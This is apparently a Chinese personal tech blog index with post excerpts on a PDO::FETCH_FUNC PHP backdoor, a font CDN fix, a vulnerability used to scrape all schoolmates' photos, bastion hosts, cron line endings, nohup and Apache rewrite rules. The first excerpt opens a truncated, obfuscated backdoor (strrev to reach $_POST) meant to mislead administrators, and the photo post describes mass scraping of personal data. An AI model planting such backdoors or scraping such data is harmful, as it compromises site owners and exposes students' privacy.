利用PDO::FETCH_FUNC特性留后门

翻手册的时候发现fetch_argument的参数PDO::FETCH_FUNC可以回调一个函数,用这东西留个后门应该可以迷惑部分管理员。
适用于:(PHP 5 >= 5.1.0, PECL pdo >= 0.1.0)

1
2
3
4
5
6
7
8
<?php

if(($db = @new PDO('sqlite::memory:')) && ($sql = strrev('TSOP_')) && ($sql = $$sql)) {
	$stmt = @$db->qu[......]

Read more

360CDN关停,改用新的谷歌字体源解决wordpress访问慢的问题

qq%e6%88%aa%e5%9b%be20160916133031

一大早BUG吧的美女Q说360cdn停用了,因此很多人发现自己的wordpress博客打开特别慢(其实好像就我自己博客特别慢= =),具体公告在这里http://bbs.360.cn/thread-14471550-1-1.html

我之前用的是DW Replace Open Sans插件 解决的问题(http://www.changwei.me/archives/112),现在我们只要直接修改插件里面的链接为

https://cdn.moefont.com/fonts/css?family=Open+Sans%3A300italic%2C400italic%2C600ital[……]

Read more

最近挖到一个漏洞,可以扒下全校学生的照片

其实理很简单的,只给一张图点到为止,这在乌云里面算是比较基础的敏感信息泄漏漏洞了,我们这一届大概五千多人,php写个小脚本挂一两个小时就可以全部扒下来。如果是我自己写网站的话,我的建议还是把图片用md5进行随机重命名或者直接从数据库动态取出的形式来储存照片等敏感信息比较安全,对于权限管控也更加灵活。qq%e5%9b%be%e7%89%8720160914213504

浅析堡垒机概念及工作原理

摘 要:在信息化社会,企事业单位业务对信息系统高度依赖,而信息系统维护人员往往拥有系统最高管理权限,其操作行为必须得到有效监管与审计。作为运维操作审计最佳解决方案的堡垒机通常会给人一种神秘莫测的感觉,为了让大家更清楚的了解堡垒机和运维操作审计,本文对堡垒机的概念及主要工作原理进行简要分析。

关键词:堡垒机、运维操作审计、工作原理

  1 前言

当今的时代是一个信息化社会,信息系统已成为各企事业单位业务运营的基础,由于信息系统运维人员掌握着信息系统的最高权限,一旦运维操作出现安全问题将会给企业或单位带来巨大的损失。因此,加强对运维人员操作行为的监管与审计是信息安全发展的必然趋势[……]

Read more

因为编码问题导致cron无法执行的解决方案

最近在使用腾讯云服务器(centos6.5 64bit系统)的时候碰到一个非常奇怪的问题,就是cron服务完全正常,但是写在crontab里面的命令就是没按时执行,于是打开/var/log/cron日志文件查看日志发现所有执行的命令后面自动带上了一个^M这样的小尾巴,遂百度“^M”看看这是个什么玩意儿,百度得知这是DOS编码和UNIX编码混合在同一个文件的环境下导致换行编码错误,解决方案参考http://www.changwei.me/archiv…即可

去除vim ^M符号

有两种情况,会出现打开的文件都显示^M符号:
1. vim被配置为fileformat=unix,而你打开的文件都是dos格式的。unix格式的换行符为0A(ascii码)也就是<LF>,dos格式的换行符为 0D 0A(也就是<CR><LF>),<CR>其实就显示为^M。下面是详细讲解:
DOS, Mac 和Unix格式的文件
回想计算机的史前史,那时的打字机使用两个字符来开始一个新行。
首先是一个字符命令使打印头移回开始位置(回车,<CR>),然后另一个字
符命令控制向前进纸一行(进纸,<LF>).
在计算[......]

Read more

linux的nohup命令的用法

在应用Unix/Linux时,我们一般想让某个程序在后台运行,于是我们将常会用 & 在程序结尾来让程序自动运行。比如我们要运行mysql在后台: /usr/local/mysql/bin/mysqld_safe –user=mysql &。可是有很多程序并不想mysqld一样,这样我们就需要nohup命令,怎样使用nohup命令呢?这里讲解nohup命令的一些用法。

nohup /root/start.sh &

在shell中回车后提示:

[~]$ appending output to nohup.out

原程序的的标准输出被自动改向到[……]

Read more

Linux开启url重写的方法:

1、打开 apache 里httpd.conf(通常是在/etc/httpd/conf目录里)

2、找到 #LoadModule rewrite_module modules/mod_rewrite.so 去掉前面的#

3、找到 AllowOverride None 改成 AllowOverride All , 有两个全部改掉

注:AllowOverride 的参数设置为ALL,表示整台服务器上都支持URL规则重写。Apache 服务器要读每个网站下目录下的 .htaccess 文件。如果没有这个文件,或者这个文档没有定义任何关于URL重写的规则就不会有任何效果。[……]

Read more

.htaccess重写规则以及参数说明

先看下面一条RewriteRule命令:

RewriteRule ^Products/P([0-9]+)\.html$ /Product.php?product_id=$1 [ L ]

一个基本的RewriteRule命令中有二个参数。在上面的例子中有三个参数。下面我们详细说说这些参数的含义。

RewriteRule命令的第一个参数是一个正则表达式,描述了想要重写的URL地址的匹配模式。第二个参数说明了目标URL地址。用上面这条重写规则来说,任何匹配模式 ^Products/P([0-9]+)\.html$ 的URL地址都将重写为 :/Product.ph[……]

Read more

Apache重写规则由浅入深剖析.htaccess

1、.htaccess文件使用前提

.htaccess的主要作用就是实现url改写,也就是当浏览器通过url访问到服务器某个文件夹时,作为主人,我们可以来接待这个url,具体 地怎样接待它,就是此文件的作用。所有的访问都是通过URL实现,所以.htaccess的作用非同小可。正因为此,所以一般地网站通过设 置.htaccess,通过一个十分友好的url吸引用户进来,然后用.htaccess把用户带到需要访问的位置。

要想使用这个强大功能,就得开启apache里面的重写模块。

前面的文章中曾经讲到过windows和ubuntu开启 rewrite模块使用.htaccess 。[……]

Read more